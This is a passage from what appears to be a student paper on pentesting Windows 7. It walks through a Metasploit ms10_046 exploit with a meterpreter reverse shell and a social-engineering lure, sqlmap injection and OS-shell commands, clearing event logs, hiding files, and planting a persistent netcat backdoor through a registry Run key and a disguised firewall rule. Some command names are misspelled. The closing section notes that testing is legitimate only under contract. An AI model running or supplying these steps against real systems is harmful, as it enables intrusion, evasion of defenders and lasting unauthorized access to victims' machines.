there are a plethora of tools contained within this suite. To give you an example of the
functionality NMAP natively tied into this suit as well as some webserver hosting tools.
Metasploit is the Swiss army knife when it comes to penetration testing. I will begin this section
by exploiting ms10_046. Again, the format of the exploit title is given out by Microsoft. The first
part is the year and the last part is the number incremented of each they have discovered.
Ms10_046 is a vulnerability in the handling of Windows shortcut files (.LINK) that can contain
an icon resource pointing to a malicious DLL. The Metasploit Module for this creates a
WebDAV service that can be used to run an arbitrary payload when accessed as an UNC path.
First we start Metasploit framework by typing the following command.
Msfconsole
This will start the suit and load up a modified shell. From there we type
use exploit/windows/browser/ms10_046_shortcut_icon_ddlloader
This loads the module for that particular exploit. From there you are now able to set options for
the payload and even the exploit. Some options may be required. To see the options type
show options
Now we will set the current payload
set payload windows/meterpreter/reverse_tcp
![Page 27: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/27.jpg)
26
Meterpreter is where all the magic happened after the payload launches Meterpreter and gives us
a nice shell back to the Windows 7 box. Meterpreter uses DLL injection and communicates over
Ruby stager socket. It gives us command remote command line ability. We are going to set the
options to use the local host a hosting server for our malicious site.
set SRVHOST 192.168.1.15
set LHOST 192.168.1.15
Review your options after you are done. That’s it! Now we can exploit simple type exploit.
Now we social engineer our victim into either going to the following page
\\192.168.1.15\mhjs\.
Or we can get them to render the icon of this URL
http://192.168.1.15/<anything>.lnk
This will cause a cause a Meterpreter session to be opened giving you a shell to the box.
Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.13:53636)
To get to your session you type
Session –I -1
That is all for Metasploit basics. This example is especially significant to me because social
engineer pentesting combined with the direct attack methodologies of something like Metasploit
make this very potent. Most people fall victim to social engineering attacks. I will continue
where we left off on this in the section 6.1 and 6.2. The next section I am going to discuss how to
use SQLmap which is a tool that has a place in my heart for dumping databases like a champ.
![Page 28: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/28.jpg)
27
5.2 Webapp penetration and database dumping
SQLmap is a fantastic tool for finding SQL injections, manipulating database queries,
and dumping databases. It is in combination next to what I use with Metasploit. I will first
explain what a GET and POST parameters are to refresh your memory. In simpler terms a GET
Method is requesting data from a specific resource and a POST method is submitting data to be
processed to a specific recourse. Both methods travel within HTTP, although GET key pair
values are within the URL and POST is in the data portion of the request itself. There are many
other pros and cons to them but I will exploit both for a better example. Let’s start with
exploitation of the GET parameter.
Finding if the SQL inject is valid (the result will be the banner if valid).
sqlmap –u http://site.com/info.php?user=test&pass=test –b
(Kim 70)
Retrieving the database username:
sqlmap –u http://site.com/info.php?user=test&pass=test –current-user
(Kim 70)
Interactive shell
sqlmap –u http://site.com/info.php?user=test&pass=test –os-shell
(Kim 70)
If you are stuck with commands and you need help, you can always type sqlmap –wizzard.
![Page 29: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/29.jpg)
28
The –u signifies a valid URL if you didn’t catch on. Kim states “If you need to test an
authenticated SQLmap injection finding, log into the website via a browser and grab the cookie.
Then you can define it using the data=[COOKIE] switch.”(Kim 70).
Next, I will move onto using the POST method.
Finding if an SQL inject is valid (the result will be in the banner if valid):
sqlmap –u http://site.com/info.php --data=”user=test&pass=test” –b
(Kim 71)
Retrieving the database username:
sqlmap –u http://site.com/info.php --data=”user=test&pass=test” –-current-user
(Kim 71)
Interactive shell:
sqlmap –u http://site.com/info.php --data=”user=test&pass=test” –-os-shell
(Kim 71)
SQL map has a collection of SQL injections build in. You may specify whether you want it to be
a blind injection where the test may come out a little more harder but those are more frequent to
catch or even a timed method were we send a wait command to the DB and time when the
database responds back. If the response is slowed then we have successfully used injection. We
are able to retrieve a lot out of this injection form what was stated. The shell is considered gold if
you can get it. The other option besides SQLmap is SQLninja. You would use this because it
may help evade IPS signatures that would possibly detect SQLmaps based injections.
![Page 30: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/30.jpg)
29
6 Covering Tracks and Persistence
The reason to cover your tracks when you are in a system should be common sense.
When you enter a system you do not want to leave behind a digital footprint. Wilhelm gives us a
reason to stay stealthy, “System administrators use similar techniques to identify malicious
activity, when compared to network defenses. A system administrator can examine log files,
install applications the watch for malicious software, and set up monitors on a system to see if
anything inappropriate is running (such as a backdoor or brut force application) and harden their
systems in such a way that any changes within essential systems files are prevented and alerted
upon.”(Wilhelm 391).
Thomas also states, “Professional penetration testing requires stealth to avoid detection
during attacks that traverse the target network, but rarely involves cover tracks while in a target
system. In cases where part of the project is to determine the ability of the system administrators
to detect attack, some of the techniques in this chapter can be use full.”(Wilhelm 405)
There are some very basic methods when covering your tracks like using reverse tunnels
connected through proxies or using a VPN. The most common and more frequently used
methods are wiping logs and hiding files. This should be routine for penetration testers. Although
if this little step is missed, you will have all your activity logged whether it is in Linus or in
Windows. System administrators use log files very frequently to debug and to detect as Wilhelm
mentioned. Their main duty at work is to view the logs daily and some go to the extent of doing
that every 30 minutes. So being up to date on logging activity is essential.
![Page 31: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/31.jpg)
30
6.1 Keep calm…Clear the logs
If we have a session opened up by Meterpreter, clearing the logs is as simple as typing:
getssystem
clearrev
Below is an example output.
CLEARING LOGS
Figure 3 – from null-byte.wonderhowto.com
Hiding files is very basic but won’t necessarily help you elude virus detection and so
forth. It is still used every time as good practice to ellude the naked eye from victims.
Hiding files simply put is done with this command:
attrib +h virus.exe
Virus.exe is an example, for you may put any file you like in there.
![Page 32: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/32.jpg)
31
6.2 Backdoors for Everyone!
Persistence is another thing we are concerned about when wanting to maintain current
access in the box. Wilhelm states, “Our original compromise of the system may become blocked
through system patching or network changes preventing us from exploiting the system whenever
we need access.”(Wilhelm 387). I will explain how to be persistent and setup a netcat back door.
First we need to get a Meterpreter session like before, once we have that we can then upload the
backdoor with is netcat a program that writes and reads from sockets.
upload /usr/share/windows-binaries/tools/nc.exe C:\\windows\\system32
Next we need to make netcat start up on 443 when Windows starts
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Then we add netcat into the startup process.
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
Next we configure the computer to allow remote connections outside the victim’s box through
443.
netsh advfirewall firewall add rule name="svchost service" dir=in action=allow
protocol=TCP localport=443
That is it now on the attacking machine and you should be able to connect to the victim by
connecting from netcat with this command.
nc -v victim_ip_address port
![Page 33: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/33.jpg)
32
Conclusion
Penetration testing is breaking into a network to document vulnerabilities; sometimes
called a “threat and vulnerability assessment”. Even though systems are complicated or poorly
understood, it has come a long ways in the recent years. Some of the best penetration testers that
I know in the industry are self-taught and have a drive and passion to learn everything in sight.
With technology continuously changing, much of their success comes not from knowledge kept,
but from knowledge shared and the collaboration of knowledge is essential to every pentester.
Since the width of knowledge in this field is massive for some, it may be best to pick a
specialization and grow in that area. However, you do not need to stay specialized but it does
help to learn out of bound fields. The main thing to remember when in the penetration business is
to keep up with current methodologies and be willing to expand your intellect on some of the
more challenging aspects. I must warn that there is a spectrum of negativity with pentesting due
to the ease of exploitation. Most recognizable forms can be found in social engineering since it
has a sub field of penetration testing. With humans, first you undermine the person and then
exploit him/her when you have gained the leverage. Another example is a customer trying to use
fake money at a store to see if the cashier accepts it. The underling goal in both situations is to
take advantage of someone. A penetration tester can so the same with a computer without having
any human interaction. This is why some people believe penetration testing is more of a “hidden
education” because the direct knowledge learned from it can be used for malicious intent. With
that being said, it is wise to manage your talent, intellect, knowledge, and competitive urge and
use it for a good purpose. Pentetration testing is only orthodox when there is a legal binding
contract. Life is about continuous learning, growing and the discovery of new things. Apply this
passion with computer technology and the sky’s the limit for success.
![Page 34: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/34.jpg)
33
References
Gallagher, Tom, Bryan Jeffries, and Lawrence Landauer. Hunting Security Bugs. Redmond,
WA: Microsoft, 2006. Print.
Kim, Peter. The Hacker Playbook: Practical Guide to Penetration Testing. North Charleston,
SC: Secure Planet, LLC, 2014. Print.
Wilhelm, Thomas. Professional Penetration Testing: Creating and Operating a Formal Hacking
Lab. Burlington, MA: Syngress Pub., 2010. Print.
Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Finding and
Exploiting Security Flaws. Indianapolis, IN: Wiley, 2011. Print.
DeFino, Steven. Official Certified Ethical Hacker Review Guide. Boston, MA: Course
Technology, Cengage Learning, 2010. Print.
Lyon, Gordon Fyodor. Nmap Network Scanning: Official Nmap Project Guide to Network
Discovery and Security Scanning. Sunnyvale, CA: Insecure.Com, LLC, 2008. Print.
Chen, S., J. Xu, Z. Kalbarczyk, and K. Iyer. "Security Vulnerabilities: From Analysis to
Detection and Masking Techniques." Proceedings of the IEEE 94.2 (2006): 407-18.
Microsoft Research. Microsoft, Feb. 2006. Web. 5 Oct. 2014.
< http://research.microsoft.com/en-us/um/people/shuochen/papers/ieee-proc.pdf>.
Kane, Brian. "INTRODUCTION." Journal of Music Theory 54.1, CAVELL'S "MUSIC
DISCOMPOSED" AT 40 (2010): 1-4. WhiteHat Security. WhiteHat Security, May 2013.
10/1 Oct. 2014. <https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf>.
![Page 35: Pentesting Windows - Computer Science Departmentcsc.csudh.edu/cae/wp-content/uploads/sites/2/2013/11/Final-Draft...This paper will focus on the main aspects of pentesting windows 7.](https://reader033.fdocuments.us/reader033/viewer/2022051802/5af780467f8b9a5b1e909826/html5/thumbnails/35.jpg)
34
Appendix